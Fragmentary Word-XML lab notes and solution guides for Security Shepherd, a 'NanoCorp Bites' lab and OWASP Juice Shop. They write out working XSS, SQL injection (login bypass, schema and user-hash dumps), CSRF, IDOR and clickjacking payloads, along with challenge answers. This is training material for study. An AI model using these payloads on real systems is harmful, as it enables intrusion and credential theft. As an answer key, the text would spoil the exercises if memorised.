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SHEPHERD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i. remove not from cookie</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> do not reload</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> click on check lesson complete button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"&gt;&lt;/IFRAME&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;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&lt;IMG SRC="#" ONERROR="alert('XSS')"/&gt;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&lt;INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/&gt;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&lt;IFRAME SRC="javascript:alert('XSS');&gt;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this in the textbox. done. keep clicking on ok in the alert dialogue box.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iii. XSS One — Quick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form filters basic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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags, so bypass it with a different tag/event handler.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&lt;img src=x onerror="alert(1)"&gt;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Paste the payload into the search box.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Search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alert pops → result key appears. Submit it.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iv. For this one the answer is Battery777 (donot ask for solution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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v . MY SQL was fucked, so it didnt work, if it works for you try</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">' OR '1'='1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Vi.  use double quotes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 OR "1"="1</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Vii.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> DrumaDrumaDrumBoomBoom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Viii</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">base64isNotEncryptionBase64isEncodingBase64HidesNothingFromYou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dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==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dXNlclJvbGU9dXNlcg==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' UNION SELECT 1-- -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&lt;img src=x onerror=alert("XSS")&gt;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' UNION SELECT 1, 100, 'Troll'-- -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' UNION SELECT 1, 100, 'Troll'-- -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nano corp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> i. login</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> to login create an account, it will say admin approval req.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> try to login in again with intercept on in burpsuit</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> send the req to repeater</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> change the field upgrade insecure req to 0 (from 1 --&gt; 0)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ii. dom site scripting is happening in restaurant search bar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 &lt;script&gt;alert('XSS')&lt;/script&gt; in the search bar to see alert dialogue box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Iii. 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zaproxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in terminal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3226" l="0" r="0" t="-32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PTO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IV) BUFFERE OVERFLOW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v) Missing X-Content-Type-Options Hea</w:t>
      </w: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t20bdfyy4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Missing X-Content-Type-Options Header (Reflected in ZAP as "X-Content-Type-Options Header Missing")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ssswjfg5bkk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 Core Concept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browser downloads a file from a web server, it looks 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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header to know what to do with it (e.g., render it as text, display an image, or run it as JavaScript). If a server doesn't enforce strict types, browsers try to guess the file type—a process called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MIME Sniffing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attacker can exploit this by uploading a malicious text or image file containing hidden code, and the browser might "sniff" it and execute it as a script. Setting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X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> stops this behavior dead in its tracks.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moxm2uqnzrj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How to Test and Prove It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prove this flaw directly by looking at the raw response headers using your browser's Developer Tools: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your browser, navigate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http://192.168.20.178:42738/login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or right-click and choose </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to open the Developer Tools.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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab at the top of the developer panel.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the page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the very first request in the list (the one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at the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs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 panel on the right side, specifically under the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Headers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.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Result:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look through the list of headers returned by the server. You will notice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X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is completely missing from the list. Take a screenshot of this headers panel showing its absence as your definitive proof!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vi) Missing Anti-Clickjacking Header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6032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w25zs1pt2k4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 Core Concept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Clickjacking happens when an application allows itself to be embedded inside an invisible frame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&lt;iframe&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) on a completely different, malicious website. This allows an attacker to trick a user into clicking buttons (like "Delete Account" or "Submit Payment") without their knowledge. Secure applications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X-Frame-Options: DENY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or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Content-Security-Policy: frame-ancestors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header to prevent this.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fzd01b68ijh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How to Test and Prove It (The 1-Minute Exploit)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your Kali machine, open a terminal or a simple text editor (like Mousepad).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the following basic HTML code into a new file and save it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clickjack.html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&lt;head&gt;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&lt;title&gt;Clickjacking Test Template&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;h1&gt;If you can see the login/signup page below, it is Vulnerable!&lt;/h1&gt;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&lt;iframe src="http://192.168.20.178:42738/login" width="800" height="600"&gt;&lt;/iframe&gt;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&lt;/body&gt;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Double-click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clickjack.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to open it directly in your web browser.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Result:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the NanoCorp Bites login page successfully loads inside that box, the application is completely vulnerable to clickjacking. Take a screenshot of your browser showing the embedded page—this is your undeniable Proof of Concept (PoC).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JUICE SHOP BABY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OWASP Juice Shop — Complete Solutions Guide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Organized by difficulty. Do TIER 1 first, document those as F-01 through F-04 in your report, then tackle TIER 2 if you have time. Skip TIER 3 unless you finish everything else.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⚠️ Read these warnings before starting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Avoid the NoSQL DoS challenge — it intentionally hangs the server. If you run it, the app may freeze for everyone in your lab instance. Skip it.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Some challenges modify global state (delete reviews, change other users' data). Once done, they can't be undone without resetting the lab.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Refresh the scoreboard after every successful exploit to confirm the challenge turned green. Sometimes there's a 5-second delay.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 each successful exploit, take 2 screenshots: (a) the payload/setup, (b) the result/proof. Use filenames like F-01-payload.png, F-01-success.png.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TIER 1 — Must Solve (1-2 stars) — easy wins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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐ 1. Score Board (Miscellaneous)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Status: Already solved ✅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Description: Hidden management page that lists all challenges.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How you solved it: Navigated to /#/score-board directly.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Report this as a finding? Optional — it's more of a configuration issue than a vulnerability.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CVSS if you do: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N → 5.3 Medium (Information Disclosure)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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐ 2. DOM XSS (XSS)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Description: Reflects unsanitized user input into the page DOM, allowing JavaScript execution.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Steps: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the 🔍 search icon in the top navigation bar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Type this exact payload into the search box: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&lt;iframe src="javascript:alert(`xss`)"&gt;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Press Enter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 alert popup appears saying xss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Refresh scoreboard → "DOM XSS" turns green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Payload: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&lt;iframe src="javascript:alert(`xss`)"&gt;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Why it works: Juice Shop renders the search query into the page using Angular's [innerHTML] binding, which executes embedded scripts within iframes.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CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N → 6.1 Medium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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐ 3. Bonus Payload (XSS)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Description: Use a specific themed XSS payload provided as a "bonus".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Steps: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the 🔍 search icon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Paste this exact payload (single line, no breaks):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&lt;iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&amp;color=%23ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"&gt;&lt;/iframe&gt;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Press Enter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Scoreboard → "Bonus Payload" turns green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Note: May not actually play audio (no internet from lab usually) — the challenge solves based on the payload pattern, not the audio playing.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CVSS: Same as DOM XSS → 6.1 Medium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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐ 4. Reflected XSS (XSS)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Description: A reflected XSS in the order tracking page reflects the order ID into the page.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Steps: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First, you need an order ID. Make a quick order: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Add any product to your basket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Go to your basket → Checkout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Use default address and payment → place order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Note the order ID shown (e.g., 5267-...)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Now navigate to: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http://192.168.20.47:52106/#/track-result?id=&lt;iframe src="javascript:alert(`xss`)"&gt;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(Replace IP/port with yours)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Alert pops → scoreboard → "Reflected XSS" turns green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Alternative shortcut: Sometimes works without making an order — just paste this URL directly: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http://YOUR-IP:PORT/#/track-result?id=%3Ciframe%20src%3D%22javascript%3Aalert%28%60xss%60%29%22%3E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CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N → 6.1 Medium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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐ 5. Login Admin (Injection) — THE BIG ONE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Description: SQL injection in the login form's email field bypasses authentication entirely.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Steps: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Click Account → Logout (if you're logged in)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Click Account → Login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Email field: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' OR 1=1-- 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(note the trailing space after --)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Password field: anything, e.g., x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Log in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You're now logged in as admin@juice-sh.op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Scoreboard → "Login Admin" turns green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Payload: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' OR 1=1-- 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it doesn't work: Try these variations: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admin@juice-sh.op'--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' OR true--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') OR 1=1--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Why it works: The login query is constructed as SELECT * FROM Users WHERE email='&lt;input&gt;' AND password='&lt;input&gt;'. The ' closes the email string, OR 1=1 makes the WHERE always true, and -- comments out the password check. The first row returned is admin.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CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H → 9.8 Critical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🎯 Document this as F-01 — it's the highest-impact finding.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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐ 6. Login MC SafeSearch (Sensitive Data Exposure)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Description: MC SafeSearch's password is publicly known via a movie reference in his promotional video.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Steps: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Login page → Email: mc.safesearch@juice-sh.op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Password: Mr. N00dles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Click Log in → success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Scoreboard → "Login MC SafeSearch" turns green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Note: This works because the password is the rapper character's signature phrase — weak/guessable password.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CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N → 7.5 High (account takeover via weak password)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TIER 2 — Should Attempt (3 stars) — moderate difficulty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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 7. Login Jim (Injection)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Description: SQL injection targeting a specific user account.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Steps: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Login form → Email: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jim@juice-sh.op'--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Password: anything (e.g., x)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Log in → logged in as Jim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Scoreboard → "Login Jim" green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Why it works: Same SQLi as Login Admin, but the '-- after Jim's email targets his row specifically.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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 8. Login Bender (Injection)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Steps: Same technique as Login Jim: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bender@juice-sh.op'--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Password: anything.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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 9. API-only XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 10. Bjoern's Favorite Pet</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">9th-apiXSS.mp4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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">10th-bjoern.mp4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Description: Bjoern Kimminich's (real-life Juice Shop author) pet name is on his public GitHub.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Steps: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Forgot password → Email: bjoern@owasp.org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Security question: "Name of your favorite pet?"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Zaya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Set new password → success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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 11. CAPTCHA Bypass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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">11-captcha bypass.mp4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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 12. CSRF (Broken Access Control)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Description: The user profile update endpoint accepts cross-origin requests without proper CSRF protection.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Steps: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While logged in to Juice Shop, create an HTML file on your Kali desktop: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nano /tmp/csrf.html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Paste this content (replace IP:PORT):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&lt;html&gt;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&lt;body&gt;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&lt;form action="http://YOUR-IP:PORT/profile" method="POST"&gt;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&lt;input type="hidden" name="username" value="CSRF-Hacked!"&gt;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&lt;input type="submit" value="Click me"&gt;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&lt;/form&gt;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&lt;script&gt;document.forms[0].submit();&lt;/script&gt;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&lt;/body&gt;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&lt;/html&gt;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nikhil(update)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&lt;html&gt;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&lt;body onload="document.forms[0].submit()"&gt;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&lt;form action="http://192.168.209.47:23671/api/Users/" method="POST"&gt;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&lt;input type="hidden" name="username" value="CSRF-Hacked"&gt;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&lt;/form&gt;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&lt;/body&gt;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&lt;/html&gt;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file in Firefox: file:///tmp/csrf.html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form auto-submits, sending a request to change your username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Visit Account → profile, see username changed to "CSRF-Hacked!"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Scoreboard → "CSRF" turns green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CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N → 6.5 Medium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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 13. Client-side XSS Protection (XSS)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Description: XSS filtering is only done client-side via Angular sanitization, bypassable by direct API calls.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Steps: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Open Firefox DevTools (F12) → Network tab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Login to your account if not logged in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Submit a product review (find any product, scroll to reviews, write one)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 Network tab, find the request to /rest/products/&lt;id&gt;/reviews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Right-click → Edit and Resend (or Copy as cURL)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 the request body, change the review message to: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{"message":"&lt;iframe src=\"javascript:alert(`xss`)\"&gt;","author":"admin@juice-sh.op"}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Send the request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Reload the product page → alert fires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Scoreboard → "Client-side XSS Protection" turns green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Easier method: Use Burp Suite — intercept the review POST, modify in Repeater, send.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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 14. Database Schema (Injection)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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">14th-database_schema.mp4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Description: Use SQL injection in product search to leak the SQLite schema.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Steps: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this URL (replace IP):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try:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">asd'))+union+select+sql,2,3,4,5,6,7,8,9+from+sqlite_master+where+type="table"-- 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http://YOUR-IP:PORT/rest/products/search?q=qwert')) UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master--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response contains the database schema (CREATE TABLE statements)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Scoreboard → "Database Schema" turns green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that exact query fails, try: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http://YOUR-IP:PORT/rest/products/search?q=')) UNION SELECT '1','2','3','4','5','6','7','8',sql FROM sqlite_master--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Why it works: The search endpoint passes user input directly into a SQLite query. UNION-based injection lets you append another SELECT to leak table definitions.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CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N → 7.5 High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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 15. Login Amy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sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">15th-amy login.mp4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Description: Amy's password is weak — based on her husband Kif's name (from Futurama).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Steps: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Login → Email: amy@juice-sh.op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Password: K1f.....F! (this is the password hint pattern)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Actual pwd: K1f…………………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 in successful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Scoreboard → "Login Amy" turns green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Note: This might take a few attempts if the exact password format differs. The "One Important Final Note" referenced in the challenge description is a clue.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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐ 16. Reset Jim's Password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sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">16th-resetjim.mp4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Description: Security questions can be answered through OSINT (Jim is Captain Kirk of Star Trek).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Steps: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Logout. Go to Account → Login → "Forgot password"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Email: jim@juice-sh.op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Security question shown: "Your eldest siblings middle name?"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Answer: Samuel (Star Trek lore — Kirk's brother)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New password: anything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Scoreboard → "Reset Jim's Password" turns green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Fira Mono" w:cs="Fira Mono" w:eastAsia="Fira Mono" w:hAnsi="Fira Mono"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐⭐⭐⭐ 25. User Credentials (Injection)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Description: Extract all user emails and password hashes via SQL injection in search.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Steps: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Build on the Database Schema challenge — you now know the Users table schema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 UNION injection to dump Users table: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http://YOUR-IP:PORT/rest/products/search?q=')) UNION SELECT id,email,password,4,5,6,7,8,9 FROM Users--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Response contains emails + bcrypt hashes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Scoreboard → "User Credentials" turns green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>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1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https://github.com/juice-shop/juice-shop/blob/master/data/static/users.yml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' UNION SELECT resultKey FROM challenge_one--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"message":{"$ne":"x"},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15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NANO CORP BITE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6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account wait for 60 sec to get verified then login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6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1st vulnerability ReflectedXSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6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Go to the restaurant page, in the search box paste “&lt;img src=x onerror=alert('Reflected-XSS')&gt;” click search then done check scoreboard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6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2nd Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Go to profile page, in Display Name Box paste “&lt;img src=x onerror=alert('Stored-XSS')&gt;” click save changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6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3rd IDOR insecure direct object reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Go to orders page then in url it will be your ip:port/orders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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6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just need to append orders/1, orders/2 to see other users order this will mark idor as done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Owasp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#1: Sensitive Data exposure</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Got to the url/ftp and get the exposed data </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">
      <w:pPr>
        <w:spacing w:after="0" w:before="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#2: Unauthenticated metrics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http://192.168.20.47:48631/metrics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before="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#3: login as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1--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#4: Broken Access Control – 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pya98jnd6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Underlying Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Direct Object References (IDOR) occur when an application uses user-supplied input to access a database object directly without verifying if the logged-in user possesses the authorization to view that specific record.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oqmm7b795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Solve It in Juice Shop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 In:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create an account or log into an existing user account on the Juice Shop instance.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an Item to the Basket:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
